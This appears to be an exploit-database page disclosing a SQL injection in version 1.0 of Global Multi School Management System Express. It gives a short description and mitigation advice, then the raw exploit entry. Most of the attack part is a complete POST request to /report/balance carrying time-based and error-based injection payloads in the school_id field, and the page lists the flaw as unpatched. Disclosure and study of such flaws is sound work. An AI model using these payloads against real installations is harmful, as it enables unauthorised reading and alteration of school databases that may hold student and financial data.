header-logo
Suggest Exploit
vendor:
Global - Multi School Management System Express
by:
Ahmet Ümit BAYRAM
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Global - Multi School Management System Express
Affected Version From: 1
Affected Version To: 1
Patch Exists: NO
Related CWE:
CPE: a:global:multi_school_management_system_express:1.0
Metasploit:
Other Scripts:
Platforms Tested: Kali Linux & MacOS
2023

Global – Multi School Management System Express v1.0- SQL Injection

The Global - Multi School Management System Express v1.0 is vulnerable to SQL Injection. The vulnerability exists in the 'school_id' parameter of the '/report/balance' endpoint. An attacker can exploit this vulnerability by injecting malicious SQL code in the 'school_id' parameter, allowing them to extract sensitive information from the database or manipulate the database.

Mitigation:

To mitigate this vulnerability, the vendor should sanitize and validate user input before executing SQL queries. Additionally, the use of prepared statements or parameterized queries can help prevent SQL Injection attacks.
Source

Exploit-DB raw data:

# Exploit Title:  Global - Multi School Management System Express v1.0- SQL Injection
# Date: 2023-08-12
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor: https://codecanyon.net/item/global-multi-school-management-system-express/21975378
# Tested on: Kali Linux & MacOS
# CVE: N/A

### Request ###
POST /report/balance HTTP/1.1
Content-Type: multipart/form-data; boundary=----------YWJkMTQzNDcw
Accept: */*
X-Requested-With: XMLHttpRequest
Referer: http://localhost
Cookie: gmsms=b8d36491f08934ac621b6bc7170eaef18290469f
Content-Length: 472
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Host: localhost
Connection: Keep-alive
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="school_id"
0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="academic_year_id"

------------YWJkMTQzNDcw
Content-Disposition: form-data; name="group_by"

------------YWJkMTQzNDcw
Content-Disposition: form-data; name="date_from"

------------YWJkMTQzNDcw
Content-Disposition: form-data; name="date_to"

------------YWJkMTQzNDcw--

### Parameter & Payloads ###
Parameter: MULTIPART school_id ((custom) POST)
Type: error-based
Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY
clause (EXTRACTVALUE)
Payload: ------------YWJkMTQzNDcw
Content-Disposition: form-data; name="school_id"
0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z' AND
EXTRACTVALUE(1586,CONCAT(0x5c,0x71766b6b71,(SELECT
(ELT(1586=1586,1))),0x716a627071)) AND 'Dyjx'='Dyjx
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="academic_year_id"

------------YWJkMTQzNDcw
Content-Disposition: form-data; name="group_by"

------------YWJkMTQzNDcw
Content-Disposition: form-data; name="date_from"

------------YWJkMTQzNDcw
Content-Disposition: form-data; name="date_to"

------------YWJkMTQzNDcw–

Navigation

Suggest Exploit

Services By CQR